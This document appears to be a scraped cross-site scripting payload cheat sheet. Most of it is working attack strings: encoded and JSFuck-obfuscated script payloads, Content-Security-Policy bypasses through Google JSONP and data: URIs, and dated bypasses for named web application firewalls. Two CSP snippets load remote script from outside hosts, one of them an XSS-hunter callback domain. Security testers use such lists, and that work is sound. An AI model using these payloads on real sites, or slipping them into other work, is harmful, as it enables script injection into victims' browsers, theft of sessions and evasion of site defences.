使用奇怪的编码或本机解释绕过 1 2 3 4 5 <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="alert(1)" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[
+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
Bypass using jsfuck
Bypass using jsfuck functions
1 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
CSP bypass
Check the CSP on https://csp-evaluator.withgoogle.com and the post: How to use Google's CSP Evaluator to bypass CSP

Bypass CSP using Google's JSONP (trick by @apfeifer27)
//google.com/complete/search?client=chrome&jsonp=alert(1);

```html
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```

More JSONP endpoints:

Works for a CSP like Content-Security-Policy: default-src 'self' 'unsafe-inline';, POC here

```js
script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);
```

```js
// CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
```

Works for a CSP like script-src self

```html
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```

Works for a CSP like script-src 'self' data:, as warned in the official Mozilla documentation.

```html
<script src="data:,alert(1)">/</script>
```

Common WAF bypass

25th January 2021

```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```

21st April 2020

```html
<svg/OnLoad="`${prompt``}`">
```

August 2019

```html
<svg/onload=%26nbsp;alert`bohdan`+
```

June 2019

```html
1'"><img/src/onerror=.1|alert``>
```

June 2019

```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```

Cloudflare XSS bypass - 22nd March 2019 (by @RakeshMane10)

```html
<svg/onload=alert()//
```

Cloudflare XSS bypass - 27th February 2018

```html
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
```

Chrome Auditor - 9th August 2018

```html
</script><svg><script>alert(1)-%26apos%3B
```

Live example by @brutelogic: https://brutelogic.com.br/xss.php

Incapsula WAF bypass by @Alra3ees - March 2018

```html
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```

Incapsula WAF bypass by @c0d3G33k - September 2018

```html
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```

Incapsula WAF bypass by @daveysec - May 2019

```html
<svg onload\r\n=$.globalEval("al"+"ert()");>
```

Akamai WAF bypass by @zseano - June 2018

```html
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```

Akamai WAF bypass by @s0md3v - October 2018

```html
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```

WordFence WAF bypass by @brutelogic - September 2018

```html
<a href=javascript:alert(1)>
```

Fortiweb WAF bypass by @rezaduty - July 2019

```html
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```

Labs

References